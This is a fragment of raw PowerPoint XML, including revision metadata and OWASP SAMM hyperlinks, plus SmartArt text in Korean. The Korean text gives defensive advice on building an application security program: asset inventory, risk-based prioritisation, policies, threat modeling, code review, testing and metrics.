            <ac:spMk id="3" creationId="{81EC5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:55:37.049" v="2143" actId="108"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1107843752" sldId="322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7:33:32.265" v="2152" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2323774989" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:33:32.265" v="2152" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2323774989" sldId="323"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add modTransition">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:45:13.877" v="2155" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2201333637" sldId="324"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}"/>
    <pc:docChg chg="undo modSld">
      <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:42:37.562" v="87" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:42:37.562" v="87" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2630728331" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:38:51.545" v="30" actId="20577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5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:42:37.562" v="87" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:39:39.687" v="5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Code_Review_-_1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology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Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1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ko-KR" altLang="en-US" sz="1050" b="1" dirty="0"/>
            <a:t>시작하기</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/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 sz="1000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 sz="1000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/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 모든 응용프로그램 및 관련 데이터 자산을 문서화하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>규모가 큰 조직은 이러한 목적으로 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>를 구현하는 것을 고려해야 합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t> 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ko-KR" altLang="en-US" sz="1050" b="1" dirty="0"/>
            <a:t>위험기반 포트폴리오 접근법</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/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F576BD5F-AD4E-429F-935A-1A67C630AE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en-US" sz="800" dirty="0"/>
            <a:t>  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>비즈니스 관점에서 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>애플리케이션 포트폴리오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>의 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>보호 요구사항</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>을 파악하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" type="parTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EBA831D-0061-461C-A1EF-795466184E12}" type="sibTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3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ko-KR" altLang="en-US" sz="1050" b="1" dirty="0"/>
            <a:t>기본이 강력해야 한다</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/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ko-KR" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>모든 개발팀들이 지킬 수 있는 애플리케이션 보안 베이스라인을 제공하는 일련의 집중된 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>정책과 기준</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>을 구축합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRP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FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E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ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>재사용 가능한 보안 통제의 공통 집합</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>을 정의하여 정책들과 기준들을 보완하고</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>사용할 때 필요한 설계 및 개발 지침을 제공합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" type="parTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}" type="sibTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1050" b="1" dirty="0"/>
            <a:t>기존 프로세스와 보안 통합</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BC25BDC-3278-4082-B675-15E8A5144241}" type="parTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" type="sibTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39E7FF2B-BF9A-4849-B74B-F0434B480B0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ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 기존 개발 및 운영 프로세스들에 안전한 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>구현</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>검증</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 활동을 통합하고 정의합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>활동들은 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>위협 모델링</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>안전한 설계 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>검토</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0" err="1"/>
            <a:t>시큐어</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 코딩 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>코드 리뷰</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>침투 테스트</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>그리고 교정입니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" type="parTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}" type="sibTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C40210B5-480D-4766-978A-36F3F23CB9B8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1050" b="1" dirty="0"/>
            <a:t>관리적 가시성 제공</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" type="parTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A003834B-8490-4CC6-B531-19539D19FBD4}" type="sibTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7816F859-9BB8-418F-993B-33CDEC6D01E8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ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 측정기준으로 관리합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>측정기준 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0" err="1"/>
            <a:t>캡처</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 된 분석 데이터를 기반으로 개선을 하고</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>자금 지원 결정을 받는다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>측정기준에는 유형 및 사례 개수에 따라 보안 사례</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>활동</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>발견된 취약점</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>완화된 취약점</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>애플리케이션 범위</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>결함 빈도를 포함합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" type="parTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}" type="sibTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0945CDD4-9E6A-4629-B151-EFF4819549C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/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>핵심 개선 영역과 실행 계획을 정의하기 위해 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>여러분의 조직과 유사기관과 비교하는 역량 갭 분석</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>을 수행하게 하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" type="parTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}" type="sibTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0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en-US" sz="800" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>요구하는 엄격한 수준과 적용 범위를 제대로 정의하기 위한 보증 지침을 구축합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" type="parTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
